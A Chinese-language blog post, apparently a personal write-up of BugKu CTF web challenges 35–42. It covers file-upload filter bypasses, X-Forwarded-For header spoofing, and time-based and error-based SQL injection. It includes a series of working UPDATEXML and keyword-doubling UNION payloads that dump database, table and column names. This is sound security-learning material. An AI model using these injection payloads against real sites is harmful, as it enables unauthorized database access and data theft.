CTF-BugKu-WEB-35-41

2020.09.19

go on，今天務必搞定web

經驗教訓

1. 能運行php標簽的擴展名有php4，phtml，phtm，phps，php5等，可以在php被過濾的時候嘗試；
2. html請求頭中，對內容是不區分大小寫識別的，有時候小寫被過濾了，可以試試參雜大寫字母，比如Content-Type: multipart/form-data;被過濾，可以考慮Content-Type: Multipart/form-data;
3. 檔案上傳漏洞中，主要修改三個地方，兩處Content-Type，一處檔案名；
4. remote_addr代表客戶端IP，當前配置的輸出結果為最后一個代理服務器的IP，并不一定是真實客戶端IP；
5. 在沒有特殊配置情況下，X-Forwarded-For請求頭不會自動添加到請求頭中；
6. php中，explode()方法相當于py中的split，用于用標志分割字串成陣列；
7. 報錯注入一般式子為' OR UPDATEXML(1,CONCAT('~',(database()),'~'),3)OR '，利用的是UPDATEXML第二個引數需要是Xpath格式，用CONCAT連接不是Xpath格式的符號～達到報錯目的，～的ascii碼是0x7e，可以用這個替代前式子中的'~'；
8. insert、delete、update中進行報錯注入的位置是在資料后邊閉合引號添加上邊式子就行了；
9. 如果鏈接出現了重定向，那么務必要關注一下訊息頭；
10. 如果a、b兩個值不相同，則異或結果為1，如果a、b兩個值相同，異或結果為0；

第三十五題 細心

https://ctf.bugku.com/challenges#細心

1. 打開，猛一看還以為這題又不能做呢，原來是自定義的404
   
2. 看到自定義的404，那么就要想到一個檔案.htaccess，是php的組態檔，用來自定義404等等其他操作，訪問試試，很好，我們得到了默認的404??
   
3. 題干提示了txt，那么就想到robots.txt，同樣的，依舊是php自帶的檔案，用來存盤目錄的好像是，訪問得到線索resusl.php
   
4. 訪問得到下邊界面，看著沒啥用，還好最下邊給了點提示，意思就是請求x的值來等于password唄
   
5. 我隨便試了一個resusl.php?x=admin，萬萬沒想到就進去了，不管給了flagflag(ctf_0098_lkji-s)，還給了所以訪問IP，太狠了??
   

第三十六題 求getshell

https://ctf.bugku.com/challenges#求getshell

1. 打開是這樣的，難不成是檔案上傳漏洞，啊哈哈，滿足他這個奇怪的要求??
   
2. 你不要php我就不給你嗎？不存在的，上傳一句話php試試，上傳.php檔案不行，于是上傳.php.jpg檔案，被更改了檔案名，導致不能正常訪問
   
3. 沒啥思路了，看看wp，學到了遺忘的知識，
4. wp中的做法主要是修改了三個地方，兩處Content-Type，一處檔案名，修改的第二處Content-Type和檔案名我們都好理解，但是第一處Content-Type我沒明白怎么回事，我上傳了正兒八經的jpg檔案，Content-Type也是 multipart/form-data;，出題人為啥要過濾這個……還有就是怎么發現的他存在這個過濾，純靠猜測么……并且這個題，你只要上傳成功檔案就給了flag，
   
5. flag是KEY{bb35dc123820e}，這題沒搞明白什么思路……
   

第三十七題 INSERT INTO注入

https://ctf.bugku.com/challenges#INSERT%20INTO注入

1. 打開鏈接，看到自己的ip
   
2. 題目中給了源代碼，結合第一步結果進行代碼審計：

error_reporting(0);

function getIp(){
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ //獲取X-Forwarded-For或者Remote_Addr的值
$ip = $_SERVER['HTTP_X_FORWARDED_FOR']; 
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip); // 以,為分割，把ip分割為陣列
return $ip_arr[0]; //回傳第一個ip，也就是客戶機ip

}

$host="localhost";
$user="";
$pass="";
$db="";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");

mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')"; // 注入點，我們可以通過X-Forwarded-For來提供一個假的ip，從而進行注入，這里沒有任何過濾，
mysql_query($sql);

3. 有了思路，我隨便試了一個ip，還真成了，那么，insert該怎么注入呢？
   
4. 一般可以用報錯注入，順便復習了一下報錯注入，報錯注入，一般式子為INSERT INTO table(a,b) VALUES('qwk' OR UPDATEXML(1,CONCAT('~',(database()),'~'),3)OR '')，這個地方不可以使用，因為這個式子包含了逗號，但是源代碼對逗號進行了過濾（用逗號作標志分割了輸入），有沒有什么辦法能不用逗號？
5. 原來如此，這個題，沒有報錯，沒有查詢回顯，只能用延時注入，延時注入的一般式子為1’ and if(length(database())=1,sleep(5),1) #，1’ and if(ascii(substr(database(),1,1))>97,sleep(5),1) #，這中間也有逗號，所以，我們要找一個沒有逗號的方法來代替if陳述句和substr陳述句，
   • 還有一種判斷執行陳述句：select case when 判斷條件 then 執行陳述句1 else 執行陳述句2 end
   • substr(database() from 1 for 1) = substr(database(),1,1)
   • 方法找到了，那么接下來就是寫腳本了，因為是盲注，需要sleep方法，需要大量的請求，所以需要腳本幫忙，并且這種盲注有兩種方法，一種是二分法，這個方法比較難理解，但是比較快速，還有就是遍歷法（我自己取得名字……），這種比較慢，但是好理解，結果直觀，我打算兩種都試試，畢竟遇見一個好題不容易，哈哈哈，我打算專門寫一個隨筆介紹各種方法，奧力給??
6. 經過測驗，我發現這個題好像不能做了，怎么也得不到結果，是我的問題嗎？直接搬wp也不行，有沒有老鐵也到和我一樣的問題啊……比較全面的wp

第三十八題 這是一個神奇的登陸框

https://ctf.bugku.com/challenges#這是一個神奇的登陸框

1. 又一道404
   

第三十九題 多次

https://ctf.bugku.com/challenges#多次

1. 打開如下，我發現若存在重定向，那就得好好關注一下這個訊息頭，重定向后的payload是1ndex.php?id=1
   
2. 測驗修改id的值，知道id=5時，出現了有用的訊息，所以思路時sql注入
   
3. 接下來開始測驗sql injection
   • 1'，輸出錯誤；
   • 1'%23，輸出正確，確實存在sql注入；
   • 1' ORDER BY 1 %23，輸出錯誤，可能存在過濾；
   • 0' ^(1) %23，輸出錯誤；
   • 0' ^(0) %23，輸出正確，說明可以用來測驗過濾；
   • 1' ^(length('select')=0) %23，輸出錯誤，說明select被過濾（輸出結果是錯誤說明最終結果是0，1與1異或后為0，所以括號中結果為true，也就是說長度為0，也就是被過濾了）
   • 1' ^(length('selecselectt')=0) %23，輸出正確，說明可以用復寫來繞過！
   • 用以上方法測驗了幾個能用得到的SELECT、WHERE、FROM、OR、UNION被過濾掉的有SELECT、OR、UNION
   • 0' UNIOunionN SELECselectT 1,2%23，輸出正確，得到顯示位置；
     
   • 0' UNIOunionN SELECselectT 1,(database()) %23，得到資料庫名web1002-1
     
   • 0' UNIOunionN SELECselectT 1,(SELECselectT GROUP_CONCAT(table_name) FROM infoorrmation_schema.tables WHERE table_schema='web1002-1') %23，得到表名flag1,hint，這里注意information中有or，所以要進行復寫繞過；
     
   • 0' UNIOunionN SELECselectT 1,(SELECselectT GROUP_CONCAT(column_name) FROM infoorrmation_schema.columns WHERE table_name='flag1') %23，得到表flag1下列名flag1,address；
     
   • 0' UNIOunionN SELECselectT 1,(SELECselectT GROUP_CONCAT(address) FROM flag1) %23，address中發現下一關地址./Once_More.php，flag1表中沒有有用資訊；
     
   • 進入下一關，依舊是id=1，再次進行測驗……??
     
   • 經過測驗，存在sql注入是沒問題，但是問題是沒有select回顯，所以不能再用上邊的辦法，當然他給了另一種方式，那就是報錯注入，這也是出題人的目的吧???♂?正好復習一遍啊哈哈哈
   • 1' AND UPDATEXML(1,(CONCAT('~',(database()),'~')),3)%23，得到資料庫名web1002-2
     
   • 1' AND UPDATEXML(1,(CONCAT('~',(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='web1002-2' ),'~')),3)%23，得到表名class,flag2
     
   • 1' AND UPDATEXML(1,(CONCAT('~',(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='flag2' ),'~')),3)%23，得到表flag2的列名flag2,address
   • 1' AND UPDATEXML(1,(CONCAT('~',(SELECT GROUP_CONCAT(flag2) FROM flag2),'~')),3)%23，得到flag2中內容為flagflag{Bugku-sql_6s-2i-4t-bug}
     
   • 這個flag變成小寫輸入即是答案，你以為到這就完了？當然不是，這個題還有下一關，既然是學習為目的，那么這次我覺得來做一把??
   • 1' AND UPDATEXML(1,(CONCAT('~',(SELECT GROUP_CONCAT(address) FROM flag2),'~')),3)%23，得到下一關地址./Have_Fun.php，干就完了??
     
   • 出題人很p，那么應該就是修改請求頭了
     
   • 添加X-Forwarded-For: 192.168.0.100后，得到一個二維碼，掃一掃得到你……你……你可以看到我? 好吧，我來自于ErWeiMa.php 順便告訴你兩個密碼 one:引數名是game; tow:flag在admin里 對了,檔案后@…c=Y
     
     
   • &……不做了，沒思路，先看一遍再說吧……

第四十題 PHP_encrypt_1(ISCCCTF)

https://ctf.bugku.com/challenges#PHP_encrypt_1(ISCCCTF)

1. 下載php打開如下，是個加密演算法，題目中的字串應該就是加密結果，我們的任務就是寫解密演算法然后得出結果???♂?

<?php
function encrypt($data,$key)
{
    $key = md5('ISCC'); // 密鑰
    $x = 0;
    $len = strlen($data);
    $klen = strlen($key);
    for ($i=0; $i < $len; $i++) { //把key重復相加成和data一樣長
        if ($x == $klen)
        {
            $x = 0;
        }
        $char .= $key[$x];
        $x+=1;
    }
    for ($i=0; $i < $len; $i++) { // 核心演算法，data和key每位ascii相加取余再ascii得到結果
        $str .= chr((ord($data[$i]) + ord($char[$i])) % 128);
    }
    return base64_encode($str); // base64后輸出
}
?>

2. 那么我是用php寫解碼方法還是用py呢？哈哈哈

#!/usr/bin/env python 3.8
# -*- encoding: utf-8 -*-
#fileName  : decry.py
#createTime: 2020/09/19 22:10:49
#author    : 喬悟空
#purpose   : 此腳本用于針對特定加密方式解密
import base64
import hashlib

miwen = "fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA="
miwen = base64.b64decode(miwen).decode()
print(miwen)
key = hashlib.md5('ISCC'.encode()).hexdigest()
print(key)
char = ''
x = 0
for i in range(len(miwen)):
    if x == len(key):
        x = 0
    char += key[x]
    x += 1
print(char)
res = ''
for i in range(len(miwen)):
    for j in range(2):
        tem = 128*j+ord(miwen[i])-ord(char[i])
        if tem<33 or tem ==127:
            pass
        else:
            res += chr(tem)
print(+res)

3. 解密結果，去掉兩個奇怪的字符就是答案Flag:{asdqwdfasfdawfefqwdqwdadwqadawd}
   

第四十一題 檔案包含2

https://ctf.bugku.com/challenges#檔案包含2

1. 奇怪，好像掛了
   

第四十二題 flag.php

https://ctf.bugku.com/challenges#flag.php

1. 明天再做，累了累了……

標籤：其他

上一篇：ipad air4引數配置

下一篇：selenium---JS修改屬性處理日歷控制元件